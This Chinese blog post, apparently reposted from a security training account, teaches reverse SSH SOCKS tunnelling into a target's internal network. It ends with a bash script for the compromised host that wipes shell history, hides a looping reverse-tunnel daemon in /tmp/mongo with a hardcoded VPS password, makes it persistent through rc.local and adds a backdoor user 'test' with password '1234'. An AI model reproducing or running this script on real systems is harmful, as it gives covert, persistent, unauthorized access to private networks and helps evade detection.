SSH如何反向代理稳定穿透内网

Posted 合天智汇

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SSH如何反向代理稳定穿透内网相关的知识,希望对你有一定的参考价值。

点击“合天智汇”关注,学习网安干货


最近在测试一些站点,总是需要进入到对方内网,而使用的代理工具多为不稳定工具,就连ssh也会断掉,这篇文章分享一下SSH的反向代理,最下面准备啦一个简单的脚本。


SSH如何反向代理稳定穿透内网

0x01 引言

SSH如何反向代理稳定穿透内网

早期我们可能会采用HTTP Proxy代理,在浏览器上设置下代理服务器的IP、端口、认证账户和密码。但有些软件的网络通信数据并不是HTTP协议,就需要寻找其它方法。


SOCKS代理是个不错的解决方案,不管应用层是什么协议,只要是传输层是TCP协议就可以代理。SOCKS代理中最新的协议是SOCKS5。相对SOCKS4作了大幅度的增强。


首先,它增加了对UDP协议的支持;其次,可支持多种用户身份验证方式和通信加密方式;最后,修改了SOCKS服务器进行域名解析的方法,使其更加优雅。


SSH如何反向代理稳定穿透内网

0x02 Socks建立

SSH如何反向代理稳定穿透内网


关于内网的代理工具前人已经总结很多了比如这篇文章内网漫游之SOCKS代理大结局,那我就不多说这些工具了。

稳定SOCKS代理SSH

SSH当之无愧是目前最稳定的代理方式之一,大家用它比较多,但是我们常用的还是他的最简单的转发与正向代理的建立,这里把SSH反向代理分享与大家,不用再为渗透中不稳定的网络而烦恼。

转发

我们常用的是下面的命令,但只能够比较麻烦的访问到已经转发端口上

1. ssh -CfNg -R 2222:127.0.0.1:22 VPS-user@VPS -p 53 //内网 


2. ssh -CfNg -L 8080:127.0.0.1:2222 VPS-user@VPS //VPS 本地访问VPS:8080就是内网的22端口


-C:该参数将使ssh压缩所有通过Secure Shell客户端发送的数据,包括输入、输出、错误消息及转发数据。它使用gzip算法,压缩级别可通过设置配制文件中的参数Compressicn Level来指定。这对于缓慢的传输线路特别有用的。但对于传输速度已经很快的网络则显得没有必要。同样,你可以利用配制文件针对每台主机配置这个参数。 


-f:该参数将ssh连接送入后台执行。这在验证已经完成且TCP/IP转发已经建立的情况下会生效。这对在远程主机上启动X程序显得十分重要。其后用户将被提示要求输入口令(提供的认证代理不运行),然后将连接送往后台。 


-g:该参数允许远程主机通过端口转发与主机端口相连,通常情况下仅允许本地主机这样做。 


-N:不执行远程指令。 


-R:远程转发 


-L:本地转发


socks正向代理

下面的方式可以用与你与DMZ区的机器通信,但是如果不能直接访问的内网机器便行不通了。

ssh -qTfnN -D port remotehost


在本地终端中运行 


ssh -qTfnN -D 6080 user@theserver 


然后在浏览器或者软件中设置好代理参数 


socks5: 127.0.0.1:6080 后便可以使用.


-q:静默运行


实已经很明显了,反向代理就是把上面提到的两个隧道连接在一起,怎么连接呢?


socks反向代理

那么重点来了,如何建立反向代理呢?其实就是把正向代理和转发结合起来即可:

这里为了方便描述,截了几个图,画得丑见笑了...:

SSH如何反向代理稳定穿透内网

第一步,还是先通过内网机器反向连接VPS:

ssh -p 22 -qngfNTR 6666:localhost:22 VPS-user@VPS

这样就把本地的22端口转发到了远程机器(VPS)的6666端口

查看图中Server机器的进程: 

SSH如何反向代理稳定穿透内网


Server机器转发: 

SSH如何反向代理稳定穿透内网


此时到vps上查看已经在6666端口开始监听了 

SSH如何反向代理稳定穿透内网


第二步,你自己的PC机器直接使用语句:

ssh -p 6666 -qngfNTD 6767 内网用户@VPS


这样就可以直接穿透网络,进入到内网,本地机器直接使用代理127.0.0.1:6767便能够直接访问到内网当中

本地远程访问: 

SSH如何反向代理稳定穿透内网


在Server上开启80端口服务

SSH如何反向代理稳定穿透内网


配置代理: 

SSH如何反向代理稳定穿透内网


访问:

SSH如何反向代理稳定穿透内网


进阶配置

那么问题来了,用过SSH的代理的朋友应该知道,我们第一步使用的连接方式在VPS监听的6666端口应该是监听在localhost上的,那么在第一步之前就应该修改一些配置了:在VPS的ssh配置当中加入如下配置GatewayPorts yes,这里是指远程转发过来的端口监听在0.0.0.0上。当然也可以你再在VPS本地转发一次即可。

这样就完了吗?当然没有,经过测试,我们是无法让这个代理保持一直在线的,SSH在一定时间没有任何的操作后就会自动的断开,那么我们同样再次修改配置文件:

找到 ClientAliveInterval 0和ClientAliveCountMax 3并将注释符号("#")去掉, 将ClientAliveInterval对应的0改成60,ClientAliveInterval指定了服务器端向客户端请求消息的时间间隔, 默认是0,不发送. ClientAliveInterval 60表示每分钟发送一次, 然后客户端响应, 这样就保持长连接了. ClientAliveCountMax, 使用默认值3即可.ClientAliveCountMax表示服务器发出请求后客户端没有响应的次数达到一定值, 就自动断开. 这样的配置就能让一个SSH的配置保持长连接了,代理就能稳定的在线。那么这样是需要每次都输入密码而且每次输入一大堆命令很麻烦,这里写了一个简单的CentOS上使用脚本来开启代理。

#!/usr/bin/env bash

#author: rootclay

export HISTSIZE=0

#install

cd /etc/yum.repos.d/ 

wget http://download.opensuse.org/repositories/home:Strahlex/CentOS_CentOS-6/home:Strahlex.repo 

yum install -y sshpass 

yum install -y screen

mkdir /tmp/mongo && chown $(whoami):$(whoami) /tmp/mongo 

sudo tee /tmp/mongo/daemon.sh <<-'EOF'

 

#!/usr/bin/env bash

while: 

do 

    /usr/bin/sshpass -p 你的VPS密码 ssh -p 22 -qngfNTR 6770:localhost:22 

    VPS-user@VPS -o StrictHostKeyChecking=no 

    sleep 18000 

    ps -ef | grep qngfNTR | awk '{print $2}' | xargs kill -9 

done 

EOF

 

chmod +x /tmp/mongo/daemon.sh 

echo "screen -dmS test /tmp/mongo/daemon.sh" >> /etc/rc.d/rc.local 

screen -dmS socks /tmp/mongo/daemon.sh 

useradd test;echo 'test:1234' | chpasswd

 

/usr/local/bin/sshpass -p "1234" ssh -p 6770 -qngfNTD 6770 test@VPS -o 

StrictHostKeyChecking=no 



本地执行执行这条命令即可,代理设置为127.0.0.1:6770即可进入内网
这样建立起来的socks网络是非常的稳定的,搭建了之后可以试一试开扫描器扫一扫,高线程都不会掉。。。而前面使用的比如EW之类的。。。一扫就挂=。=,这个开个高线程完全没问题。


别忘了投稿哟!!!

大家有好的技术原创文章。

欢迎投稿至邮箱:edu@heetian.com

合天会根据文章的时效、新颖、文笔、实用等多方面评判给予100元-500元不等的稿费哟。

有才能的你快来投稿吧!


 

合天网安实验室

网址 : www.hetianlab.com

长按图片,据说只有颜值高的人才能识别哦→

以上是关于SSH如何反向代理稳定穿透内网的主要内容,如果未能解决你的问题,请参考以下文章

markdown SSH反向代理内网穿透

ssh反向代理实现内网穿透亲测可用

frp内网穿透+Nginx反向代理

frp内网穿透+Nginx反向代理

红蓝对抗之隧道技术第二篇(reGeorg内网穿透SSH隧道本地Socks代理SSH远程转发Earthworm Socks5代理Tunna正向代理ICMP隧道DNS隧道Frp穿透)

红蓝对抗之隧道技术第二篇(reGeorg内网穿透SSH隧道本地Socks代理SSH远程转发Earthworm Socks5代理Tunna正向代理ICMP隧道DNS隧道Frp穿透)